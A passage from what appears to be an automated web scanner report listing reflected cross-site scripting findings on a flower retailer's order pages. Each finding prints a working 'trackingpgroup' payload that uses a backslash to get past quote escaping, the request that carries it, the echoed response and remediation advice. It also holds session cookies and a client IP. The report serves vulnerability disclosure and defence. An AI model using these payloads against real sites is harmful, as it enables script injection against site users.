GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBScb909\"%3balert(1)//3c15789ae2e&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:28:03 GMT
Content-Length: 62385


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBScb909\\";alert(1)//3c15789ae2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d3d\"%3balert(1)//c331d736d2e was submitted in the trackingpgroup parameter. This input was echoed as 66d3d\\";alert(1)//c331d736d2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS66d3d\"%3balert(1)//c331d736d2e&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:35:04 GMT
Content-Length: 49389


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS66d3d\\";alert(1)//c331d736d2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e370\"%3balert(1)//51a496b9619 was submitted in the trackingpgroup parameter. This input was echoed as 5e370\\";alert(1)//51a496b9619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS5e370\"%3balert(1)//51a496b9619&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:53 GMT
Content-Length: 62306


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS5e370\\";alert(1)//51a496b9619"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a02c\"%3balert(1)//1b2e7429a7 was submitted in the trackingpgroup parameter. This input was echoed as 6a02c\\";alert(1)//1b2e7429a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation mark (or in the same pass), otherwise the quote-escaping step re-introduces exactly the bypass shown here. The characters < and > should additionally be escaped (for example as \x3c and \x3e) so that a reflected value can never close the enclosing script block.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS6a02c\"%3balert(1)//1b2e7429a7&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:47 GMT
Content-Length: 46930


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS6a02c\\";alert(1)//1b2e7429a7"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d3f\"%3balert(1)//4a4ac1ba8fa was submitted in the trackingpgroup parameter. This input was echoed as 67d3f\\";alert(1)//4a4ac1ba8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation mark (or in the same pass), otherwise the quote-escaping step re-introduces exactly the bypass shown here. The characters < and > should additionally be escaped (for example as \x3c and \x3e) so that a reflected value can never close the enclosing script block.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS67d3f\"%3balert(1)//4a4ac1ba8fa&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:30:09 GMT
Content-Length: 46934


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS67d3f\\";alert(1)//4a4ac1ba8fa"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24de3\"%3balert(1)//6387582c293 was submitted in the trackingpgroup parameter. This input was echoed as 24de3\\";alert(1)//6387582c293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation mark (or in the same pass), otherwise the quote-escaping step re-introduces exactly the bypass shown here. The characters < and > should additionally be escaped (for example as \x3c and \x3e) so that a reflected value can never close the enclosing script block.

Request

GET /OrderProcess/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC24de3\"%3balert(1)//6387582c293&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:34 GMT
Content-Length: 46946


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC24de3\\";alert(1)//6387582c293"; }
   s.eVar8 = "";
